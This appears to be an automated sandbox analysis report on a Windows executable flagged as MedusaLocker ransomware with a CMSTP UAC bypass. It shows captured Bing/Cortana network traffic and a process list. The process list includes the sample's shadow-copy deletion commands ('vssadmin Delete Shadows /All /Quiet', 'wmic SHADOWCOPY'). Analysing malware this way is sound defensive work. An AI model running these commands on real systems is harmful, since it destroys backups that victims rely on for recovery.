                                    2023-01-25 18:45:12 UTC301OUTData Raw: 36 31 30 35 37 3c 2f 54 53 3e 3c 2f 45 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 43 30 34 30 39 45 38 34 43 37 45 43 34 44 31 36 41 32 43 44 44 41 34 38 30 35 45 32 44 33 43 34 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 51 46 50 65 72 66 50 69 6e 67 22 2c 22 53 54 22 3a 22 41 70 70 43 61 63 68 65 22 2c 22 43 56 49 44 22 3a 22 32 36 31 38 37 32 34 39 65 65 39 33 34 66 66 30 38 32 34 38 36 66 31 35 64 65 34 38 39 64 62 37 22 2c 22 4f 46 46
                                    Data Ascii: 61057</TS></E><E><T>Event.ClientInst</T><IG>C0409E84C7EC4D16A2CDDA4805E2D3C4</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.QFPerfPing","ST":"AppCache","CVID":"26187249ee934ff082486f15de489db7","OFF
                                    2023-01-25 18:45:12 UTC317OUTData Raw: 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 45 6e 72 69 63 68 65 64 43 6c 69 65 6e 74 49 6e 66 6f 22 3a 7b 22 4d 55 49 44 22 3a 22 31 45 31 37 42 39 42 37 30 45 39 42 34 43 36 45 39 35 37 44 31 35 39 45 44 33 36 34 36 46 46 46 22 2c 22 41 43 56 65 72 22 3a 22 34 65 66 36 36 31 66 32 22 2c 22 46 44 50 61 72 74 6e 65 72 45 6e 74 72 79 22 3a 22 61 75 74 6f 73 75 67 67 65 73 74 22 2c 22 69 73 4f 66 66 6c 69 6e 65 22 3a 30 2c 22 77 65 62 52 65 71 75 65 73 74 65 64 22 3a 31 2c 22 65 6e 74 72 79 50 6f 69 6e 74 22 3a 22 57 4e 53 42 4f 58 22 2c 22 70 72 65 76 69 6f 75 73 45 78 70 65 72 69 65 6e 63 65 22 3a 22 50
                                    Data Ascii: tcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","EnrichedClientInfo":{"MUID":"1E17B9B70E9B4C6E957D159ED3646FFF","ACVer":"4ef661f2","FDPartnerEntry":"autosuggest","isOffline":0,"webRequested":1,"entryPoint":"WNSBOX","previousExperience":"P
                                    2023-01-25 18:45:12 UTC333OUTData Raw: 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 4e 6f 6e 53 75 67 67 65 73 74 69 6f 6e 73 22 2c 22 53 43 22 3a 31 2c 22 44 53 22 3a 5b 7b 22 54 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 31 34 2c 22 51 22 3a 22 75 61 63 22 2c 22 56 61 6c 22 3a 22 53 57 22 2c 22 48 6f 22 3a 30 2c 22 47 72 22 3a 31 31 2c 22 4e 52 22 3a 31 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 2d 31 31 2e 34 34 32 33 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 34 22 3a 31 2c 22 37 22 3a 31 2c 22 31 30 22 3a 33 2c 22 31 39 22 3a 31 2c 22 32 35 22 3a 31 2c 22 34 32 22 3a 31 2c 22 35 39 22 3a 31 2c 22 31 33 33 22 3a 31 2c 22 31 33 36 22 3a 31 2c 22 31 33 37 22 3a 33 2c 22 31
                                    Data Ascii: ice":"AutoSuggest","Scenario":"NonSuggestions","SC":1,"DS":[{"T":"D.Url","K":114,"Q":"uac","Val":"SW","Ho":0,"Gr":11,"NR":1,"RankerSignals":{"rankingScore":-11.44236,"featureStore":{"4":1,"7":1,"10":3,"19":1,"25":1,"42":1,"59":1,"133":1,"136":1,"137":3,"1
                                    2023-01-25 18:45:12 UTC349OUTData Raw: 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 49 73 51 75 65 72 79 22 20 76 61 6c 75 65 3d 22 66 61 6c 73 65 22 2f 3e 3c 72 65 71 75 65 73 74 49 6e 66 6f 20 6b 65 79 3d 22 46 6f 72 6d 22 20 76 61 6c 75 65 3d 22 22 2f 3e 3c 75 73 65 72 49 6e 66 6f 20 6b 65 79 3d 22 41 70 70 4e 61 6d 65 22 20 76 61 6c 75 65 3d 22 53 6d 61 72 74 53 65 61 72 63 68 22 2f 3e 3c 2f 4f 76 72 3e 3c 2f 4d 3e 3c 2f 47 72 6f 75 70 3e 3c 47 72 6f 75 70 3e 3c 4d 3e 3c 49 47 3e 35 33 65 64 64 35 39 64 30 30 66 31 34 35 62 64 38 65 66 64 30 39 61 64 33 32 31 62 35 32 65 61 3c 2f 49 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 5d 5d 5d 3e 3c 2f 44 53 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67
                                    Data Ascii: "/><requestInfo key="IsQuery" value="false"/><requestInfo key="Form" value=""/><userInfo key="AppName" value="SmartSearch"/></Ovr></M></Group><Group><M><IG>53edd59d00f145bd8efd09ad321b52ea</IG><DS><![CDATA[[]...</DS><D><![CDATA[{"CurUrl":"https://www.bing
                                    2023-01-25 18:45:12 UTC353INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: FD1D5EBBAE7A4740B6856028FD08131D Ref B: FRA31EDGE0521 Ref C: 2023-01-25T18:45:12Z
                                    Date: Wed, 25 Jan 2023 18:45:12 GMT
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    6192.168.2.349686204.79.197.200443C:\Users\user\Desktop\98j0BL6iLT.exe
                                    TimestampkBytes transferredDirectionData
                                    2023-01-25 18:46:25 UTC354OUTPOST /threshold/xls.aspx HTTP/1.1
                                    Origin: https://www.bing.com
                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                    Content-type: text/xml
                                    X-MSEdge-ExternalExpType: JointCoord
                                    X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                    X-PositionerType: Desktop
                                    X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                    X-Search-SafeSearch: Moderate
                                    X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                    X-UserAgeClass: Unknown
                                    X-BM-Market: US
                                    X-BM-DateFormat: M/d/yyyy
                                    X-CortanaAccessAboveLock: false
                                    X-Device-OSSKU: 48
                                    X-BM-DTZ: -420
                                    X-BM-FirstEnabledTime: 132061295966656129
                                    X-DeviceID: 0100748C09004E33
                                    X-BM-DeviceScale: 100
                                    X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                    X-BM-Theme: 000000;0078d7
                                    X-BM-DeviceDimensionsLogical: 1232x1024
                                    X-BM-DeviceDimensions: 1232x1024
                                    X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAXwwSr16TwZxvghymg//XETj6Tm1HeWPPaa%2Bp3rbli/mvLOk/T6EkvQNUk399UzR3LIX4M/iQEWA7aQU%2BOfqpbEzl5FRxfViukt0nIOJC4GauVchsCLJf/OzsxoL8utB7g00/KCY%2BTs3oE5N9riluRal8eU6Lp1ZeKUF8E3dAd1WdY2OYkiMfIN6hKZymZE77pW/tUmE8J2cLrx40JkPjrOcc97Ka4s6MWsJQjAgG45Zgaw8ZAMII6%2Bh9%2BCunAdSjJkPBj6AG540X%2BB/1oCnPjGVdu/hkAggEmOTH%2BMrTonvu5uKb2W9CXRw6SSDX3iq2ZPiFJjju9%2BmNMHjpZf/rnwDZgAACPnVUJ8qmC%2B3qAHxPY%2BYLLGbXL3O%2BvyWnRNXbqpplR/SNfFS3pzS7lkShmCUmyiwax%2Bl4lLGzKvky6WQGfBUQsanWoOo38%2BGqTYOiSdJllW7r%2BTuLEeq6JUw33Lxr/TxnJ%2B58Zwuvn1wQ3WRGrQDwQyBIv//mDpGhB%2BEWVL2NAg0j0VsA2TI%2BaLgas6IJ64Xh%2BNzAw/K5ZBIt2wC5DtbafbNFDsyJu2IPWcuCXlodod0bXMQ4Vp%2BSeJxMnivHScTVa6g9gzPVuwrGWxLDLIyLX0PBk8Vtxf2iPg85vCv%2Ba6yIu9PMJpqJUzGVENLWVod%2B4tYQ2vWUJJaZDLN191JnF5s12cdic/XLMbHIjhyhX4QA0hkvf%2B2gret8Fsy/8VhtgtUQPskWn5Bk0vrmTVXVszRUs5230czaLlSQyKRH3GXkihUKMGnwj/U3vaTXVT/0xRBEwKjx95iiDkLVgrCdgH7PNRFII62usTlSZ6Bm9JbgyetkWyU2BsE4XvEr2NLqaCLUAhsj%2Bq32LZSv6VHIAmPz5JgFwgM4r7bzWT4ubL0GWqeXOX502lQL724mOtyICas1gE%3D%26p%3D
                                    X-Agent-DeviceId: 0100748C09004E33
                                    X-BM-CBT: 1660685844
                                    X-Device-isOptin: true
                                    X-Device-Touch: false
                                    X-Device-ClientSession: D8F6B43E3D444318ACE6FB571E033018
                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                    X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                    Accept: */*
                                    Accept-Language: en-US
                                    Accept-Encoding: gzip, deflate, br
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                    Host: www.bing.com
                                    Content-Length: 75003
                                    Connection: Keep-Alive
                                    Cache-Control: no-cache
                                    Cookie: MUID=1E17B9B70E9B4C6E957D159ED3646FFF; _SS=CPID=1674704691087&AC=1&CPH=4ef661f2
                                    2023-01-25 18:46:25 UTC356OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 39 61 63 31 39 61 30 30 31 33 32 37 34 62 63 39 61 34 35 32 30 32 31 30 65 61 31 35 66 30 36 33 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                    Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>9ac19a0013274bc9a4520210ea15f063</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                    2023-01-25 18:46:25 UTC372OUTData Raw: 37 62 39 61 64 38 63 30 33 66 61 30 65 63 31 30 31 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65 6e 74 57 69 64 65 73 63 72 65 65 6e 2c 72 73 31 6d 75 73 69 63 70 72 6f 64 2c 43 6f 72 74 61 6e 61 53 50 41 58 61 6d 6c 48 65 61 64 65 72 22 2c 22 77 74 22 3a 7b 22 47 51 48 5f 53 22 3a 31 31 2c 22 47 51 48 5f 50 22 3a 31 31 2c 22 47 51 48 5f 43 22 3a 38 38 2c 22 53 57 56 53 22 3a 36 30 30 2c 22 53 57 56 50 22 3a 36 30 30 2c 22 53 57 56 43 22
                                    Data Ascii: 7b9ad8c03fa0ec101</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader","wt":{"GQH_S":11,"GQH_P":11,"GQH_C":88,"SWVS":600,"SWVP":600,"SWVC"
                                    2023-01-25 18:46:25 UTC388OUTData Raw: 2f 30 2f 31 2f 31 2f 66 2f 76 69 73 69 62 6c 65 2f 64 65 66 61 75 6c 74 22 2c 22 4c 22 3a 22 34 72 2f 30 2f 44 49 56 23 64 69 61 6c 6f 67 42 6f 78 57 72 61 70 70 65 72 2f 2f 38 2f 38 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 31 2f 50 52 4f 47 52 45 53 53 23 62 5f 70 72 6f 67 72 65 73 73 2f 2f 30 2f 30 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 32 2f 44 49 56 23 63 6f 72 74 61 6e 61 48 6f 6d 65 2f 2f 30 2f 30 2f 30 2f 30 2f 32 2f 54 2f 2d 31 2b 34 72 2f 33 2f 44 49 56 2e 73 63 72 2f 2f 38 2f 38 2f 30 2f 31 2f 32 2f 54 2f 2d 31 22 2c 22 4e 22 3a 22 2d 31 2f 30 2f 2f 40 30 2f 56 32 25 32 46 64 6f 63 75 6d 65 6e 74 2f 2f 38 64 2f 40 31 2f 6e 2f 2d 31 2f 6e 2f 73 2f 73 2f 73 2b 31 35 2f 31 2f 2f 40 30 2f 42 6c 75 65 42 72 61 6e 64 2f 40 32 2f 32 2f 40 31
                                    Data Ascii: /0/1/1/f/visible/default","L":"4r/0/DIV#dialogBoxWrapper//8/8/0/0/2/T/-1+4r/1/PROGRESS#b_progress//0/0/0/0/2/T/-1+4r/2/DIV#cortanaHome//0/0/0/0/2/T/-1+4r/3/DIV.scr//8/8/0/1/2/T/-1","N":"-1/0//@0/V2%2Fdocument//8d/@1/n/-1/n/s/s/s+15/1//@0/BlueBrand/@2/2/@1
                                    2023-01-25 18:46:25 UTC404OUTData Raw: 34 2e 38 30 31 32 36 2c 22 66 65 61 74 75 72 65 53 74 6f 72 65 22 3a 7b 22 37 22 3a 31 32 35 2c 22 38 22 3a 31 2c 22 31 30 22 3a 32 2c 22 31 36 22 3a 31 32 35 2c 22 31 39 22 3a 31 2c 22 34 32 22 3a 31 2c 22 36 34 22 3a 31 2c 22 31 32 31 22 3a 31 2c 22 31 33 34 22 3a 33 34 2c 22 31 33 35 22 3a 38 2e 35 2c 22 31 33 37 22 3a 33 36 2c 22 32 36 34 22 3a 31 2c 22 32 36 36 22 3a 31 2c 22 32 36 37 22 3a 31 2c 22 32 38 31 22 3a 31 2c 22 32 38 32 22 3a 31 2c 22 32 38 34 22 3a 33 34 2c 22 32 39 36 22 3a 31 7d 2c 22 66 62 63 53 63 6f 72 65 22 3a 30 2e 39 33 34 31 31 7d 7d 5d 7d 2c 7b 22 54 22 3a 22 44 2e 43 6f 6e 74 65 6e 74 47 72 6f 75 70 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67
                                    Data Ascii: 4.80126,"featureStore":{"7":125,"8":1,"10":2,"16":125,"19":1,"42":1,"64":1,"121":1,"134":34,"135":8.5,"137":36,"264":1,"266":1,"267":1,"281":1,"282":1,"284":34,"296":1},"fbcScore":0.93411}}]},{"T":"D.ContentGroup","AppNS":"SmartSearch","Service":"AutoSugg
                                    2023-01-25 18:46:25 UTC420OUTData Raw: 22 3a 22 44 2e 55 72 6c 22 2c 22 4b 22 3a 31 30 30 32 2c 22 51 22 3a 22 57 69 6e 64 6f 77 73 20 55 70 64 61 74 65 20 73 65 74 74 69 6e 67 73 22 2c 22 4d 51 22 3a 22 75 70 64 61 74 65 73 22 2c 22 56 61 6c 22 3a 22 53 54 22 2c 22 48 6f 22 3a 32 2c 22 47 72 22 3a 31 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 37 30 34 35 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 41 41 41 5f 53 65 74 74 69 6e 67 73 50 61 67 65 52 65 73 74 6f 72 65 4d 75 73 55 70 64 61 74 65 22 2c 22 44 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 20 55 70 64 61 74 65 20 73 65 74 74 69 6e 67 73 22 2c 22 4d 44 4e 22 3a 31 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67
                                    Data Ascii: ":"D.Url","K":1002,"Q":"Windows Update settings","MQ":"updates","Val":"ST","Ho":2,"Gr":1,"DeviceSignals":{"Rank":7045,"PHits":"System.ParsingName","Id":"AAA_SettingsPageRestoreMusUpdate","DName":"Windows Update settings","MDN":1},"RankerSignals":{"ranking
                                    2023-01-25 18:46:25 UTC430INHTTP/1.1 204 No Content
                                    Access-Control-Allow-Origin: *
                                    X-Cache: CONFIG_NOCACHE
                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    X-MSEdge-Ref: Ref A: AC6482D6ECBD4769B5039392C85E7EA3 Ref B: FRA31EDGE0622 Ref C: 2023-01-25T18:46:25Z
                                    Date: Wed, 25 Jan 2023 18:46:24 GMT
                                    Connection: close


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:19:45:03
                                    Start date:25/01/2023
                                    Path:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    Imagebase:0x9d0000
                                    File size:685568 bytes
                                    MD5 hash:646698572AFBBF24F50EC5681FEB2DB7
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.246011078.0000000000A64000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000000.00000003.246642887.000000000055B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000000.00000000.246011078.0000000000A44000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.246642887.000000000056E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low

                                    General

                                    Target ID:1
                                    Start time:19:45:04
                                    Start date:25/01/2023
                                    Path:C:\Users\user\AppData\Roaming\svhost.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\svhost.exe
                                    Imagebase:0xe50000
                                    File size:685568 bytes
                                    MD5 hash:646698572AFBBF24F50EC5681FEB2DB7
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_MedusaLocker, Description: Yara detected MedusaLocker Ransomware, Source: 00000001.00000000.249765327.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.249765327.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekSHen
                                    • Rule: MALWARE_Win_MedusaLocker, Description: Detects MedusaLocker ransomware, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekshen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 90%, ReversingLabs
                                    Reputation:low

                                    General

                                    Target ID:4
                                    Start time:19:45:08
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Target ID:5
                                    Start time:19:45:08
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:7
                                    Start time:19:45:09
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:8
                                    Start time:19:45:09
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:9
                                    Start time:19:45:10
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate

                                    General

                                    Target ID:10
                                    Start time:19:45:10
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:11
                                    Start time:19:45:11
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:12
                                    Start time:19:45:11
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:13
                                    Start time:19:45:12
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\vssadmin.exe
                                    Wow64 process (32bit):true
                                    Commandline:vssadmin.exe Delete Shadows /All /Quiet
                                    Imagebase:0xae0000
                                    File size:110592 bytes
                                    MD5 hash:7E30B94672107D3381A1D175CF18C147
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:14
                                    Start time:19:45:12
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:15
                                    Start time:19:45:13
                                    Start date:25/01/2023
                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                    Wow64 process (32bit):true
                                    Commandline:wmic.exe SHADOWCOPY /nointeractive
                                    Imagebase:0x9b0000
                                    File size:391680 bytes
                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    General

                                    Target ID:16
                                    Start time:19:45:13
                                    Start date:25/01/2023
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff745070000
                                    File size:625664 bytes
                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:4.4%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:106
                                      Total number of Limit Nodes:5
